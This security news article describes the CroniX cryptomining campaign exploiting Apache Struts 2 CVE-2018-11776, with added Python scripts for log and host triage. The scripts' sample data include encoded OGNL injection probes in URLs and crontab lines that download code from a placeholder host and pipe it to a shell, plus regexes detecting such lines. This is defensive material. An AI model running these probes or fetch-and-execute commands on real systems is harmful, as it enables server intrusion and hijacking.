Active campaign exploiting Apache Struts 2 vulnerability


A Monero mining campaign is spreading by exploiting a remote code execution vulnerability

It seemed only a matter of time before attacks of this kind appeared in the wild, and they now have. According to reports from ethical hacking specialists, a well-known malicious actor has launched a large cryptocurrency mining campaign that exploits the recently disclosed remote code execution vulnerability in Apache Struts 2. The campaign uses a persistent and stealthy malware called CroniX; the name comes from the fact that it uses cron for persistence and XHide to launch executables under fake process names.

The Apache Struts 2 vulnerability (CVE-2018-11776) was disclosed a couple of weeks ago. Ethical hacking specialists have warned that it has the potential to cause even more havoc than last year's Equifax data breach, which was also the result of an Apache Struts 2 vulnerability (CVE-2017-5638).

The new campaign uses one of the proof-of-concept exploits that were published on GitHub and Twitter a few days after the vulnerability was publicly disclosed. The attackers use it to gain unauthenticated remote code execution on vulnerable Linux machines and install a Monero mining script.

As with many earlier Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which can invoke arbitrary Java code. This time the injection point is in the URL itself: the attacker sends a single HTTP request carrying the OGNL expression, and once the server evaluates it, the expression runs shell commands that download and execute a malicious file.
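As an added example (not part of the original report), here is a small Python log check for the injection point described above: an OGNL expression placed in the path of a single request to a Struts action. It scans constructed Apache-style access log lines, decodes the request path repeatedly (attackers double-encode to slip past naive filters), and flags any path that opens an OGNL expression with `${` or `%{`. The sample lines, the IP addresses and the `struts2-showcase` paths are constructed for the example; the `${(111+111)}` probe is the harmless arithmetic expression used in the public write-ups to confirm that the server evaluates the namespace segment.

```python
import re
from urllib.parse import unquote

# Constructed Apache/Tomcat combined-format access log lines (not real traffic).
# Line 2 carries a single-URL-encoded OGNL probe in the namespace segment,
# line 3 the same probe double-encoded; line 1 is benign and line 4 has the
# expression only in the query string, which this path-only check ignores.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Aug/2018:10:12:01 +0000] "GET /struts2-showcase/index.action HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Aug/2018:10:12:03 +0000] "GET /struts2-showcase/%24%7B%28111%2B111%29%7D/actionChain1.action HTTP/1.1" 302 0 "-" "curl/7.58.0"
198.51.100.9 - - [24/Aug/2018:10:12:09 +0000] "GET /struts2-showcase/%2524%257B%2528111%252B111%2529%257D/actionChain1.action HTTP/1.1" 302 0 "-" "python-requests/2.19"
10.0.0.6 - - [24/Aug/2018:10:13:00 +0000] "GET /struts2-showcase/help.action?id=%24%7Bx%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# An OGNL expression in a Struts URL starts with ${ or %{ once decoded.
OGNL_START = re.compile(r'[$%]\{')


def fully_decode(value, max_rounds=3):
    """URL-decode until the string stops changing (bounded), so that
    double-encoded payloads (%2524 -> %24 -> $) are normalised as well."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_ognl_in_path(log_text):
    """Return one record per request whose decoded URL path contains an
    OGNL expression opener. Only the path is inspected, because the
    namespace segment of the path is where CVE-2018-11776 is triggered."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group('target').split('?', 1)[0]
        decoded = fully_decode(path)
        if OGNL_START.search(decoded):
            hits.append({
                'ip': m.group('ip'),
                'time': m.group('ts'),
                'path': decoded,
                'status': int(m.group('status')),
                'user_agent': line.rsplit('"', 2)[1],
            })
    return hits


if __name__ == '__main__':
    for hit in find_ognl_in_path(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['status']} {hit['path']}  ({hit['user_agent']})")
```

A 302 whose Location header replaces the expression with its value (222 for the probe above) confirms that the server evaluated it. Widening the pattern to the query string and request body would also catch the older Struts OGNL bugs, at the cost of more false positives from legitimate template-like parameters.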

Analyzing the malware in detail, the ethical hacking experts noticed that it downloads a file called “H”, which turns out to be the old XHide tool for launching executables under a fake process name. Here it launches a fork of the XMRig Monero miner with an embedded configuration (mining pool, user name and password), and the process name is changed to “java ” so as not to raise suspicion.

The experts also noticed that three cron jobs are used for persistence; two of them refresh the backdoor every day by downloading it again from the C2 server. The third downloads a file called “anacrond” every day, which is saved into multiple cron job files across the system. In all three cases, scripts connect to the C2 server and download the deployment bash script that restarts the mining process; earlier versions of the scripts are removed from the system.

CroniX also competes with other malware: it locates and removes the binaries of any previously installed cryptominer in order to reclaim all of the CPU for itself.
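The behaviours in the last three paragraphs (argv[0] spoofing via XHide, cron jobs that re-fetch the miner from the C2, and an “anacrond” file dropped into cron directories) each leave an artefact a responder can check for. The following Python triage script is an added example, not code from the report or from the malware: it runs over a constructed process snapshot and crontab, so the PIDs, paths and the 203.0.113.50 address are made up. The process check relies on the fact that `/proc/<pid>/exe` still points at the real binary even when argv[0] has been replaced, which is what XHide does.

```python
import os
import re

# Constructed process snapshot (pid, real executable, argv[0] as shown by ps).
# On a live Linux host, collect_live_processes() below produces the same shape.
SAMPLE_PROCS = [
    {"pid": 900,  "exe": "/usr/bin/bash",                              "argv0": "-bash"},
    {"pid": 1201, "exe": "/usr/lib/jvm/java-8-openjdk-amd64/bin/java", "argv0": "java"},
    {"pid": 2222, "exe": "/usr/bin/python3.6",                         "argv0": "python3"},
    {"pid": 4410, "exe": "/tmp/.x/xmrig",                              "argv0": "java "},
]

# Constructed crontab; 203.0.113.50 is from a documentation address range.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/10 * * * * curl -fsSL http://203.0.113.50/update.sh | sh
@daily wget -q -O /etc/cron.d/anacrond http://203.0.113.50/anacrond
"""

REMOTE_FETCH = re.compile(r'\b(curl|wget)\b[^|;&]*https?://[^\s|;&]+')
PIPE_TO_SHELL = re.compile(r'\|\s*(ba)?sh\b')


def spoofed_name_processes(procs):
    """Flag processes whose advertised name (argv[0]) does not fit the binary
    they really execute. Heuristic: strip the login-shell dash and tolerate
    interpreter version suffixes (python3 vs python3.6)."""
    findings = []
    for p in procs:
        raw = p["argv0"]
        claimed = os.path.basename(raw).lstrip("-").strip()
        real = os.path.basename(p["exe"])
        reasons = []
        if raw != raw.strip():
            # "java " with a trailing space is the disguise the report describes
            reasons.append("argv[0] padded with whitespace")
        if not (real.startswith(claimed) or claimed.startswith(real)):
            reasons.append(f"claims {claimed!r} but executes {p['exe']}")
        if reasons:
            findings.append((p["pid"], reasons))
    return findings


def suspicious_cron_lines(crontab_text):
    """Flag cron entries that pull code from the network, pipe it straight
    into a shell, or reference the 'anacrond' file the report ties to CroniX."""
    out = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if REMOTE_FETCH.search(line):
            reasons.append("downloads from a remote host")
        if PIPE_TO_SHELL.search(line):
            reasons.append("pipes the download into a shell")
        if "anacrond" in line.lower():
            reasons.append("references anacrond (not a standard anacron file)")
        if reasons:
            out.append((line, reasons))
    return out


def collect_live_processes():
    """Build the SAMPLE_PROCS shape from /proc on a Linux host (root sees all)."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                argv0 = fh.read().split(b"\0", 1)[0].decode(errors="replace")
        except OSError:
            continue  # kernel thread, already exited, or not readable by us
        if argv0:
            procs.append({"pid": int(pid), "exe": exe, "argv0": argv0})
    return procs


if __name__ == "__main__":
    for pid, why in spoofed_name_processes(SAMPLE_PROCS):
        print(f"pid {pid}: " + "; ".join(why))
    for entry, why in suspicious_cron_lines(SAMPLE_CRONTAB):
        print(f"cron {entry!r}: " + "; ".join(why))
```

On a real host, run the same checks over `collect_live_processes()` and over every file under `/etc/cron*`, `/var/spool/cron` and each user's crontab, since the report notes the dropper copies its job into several cron locations rather than one.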

While cryptomining may seem less damaging than other attacks such as wiper malware, ransomware or large-scale data theft (all of which could be carried out through this vulnerability), ethical hacking specialists from the International Institute of Cyber Security point out that exploit development tends to be faster for the more widely deployed vulnerabilities, which underlines the importance of patching this particular one immediately.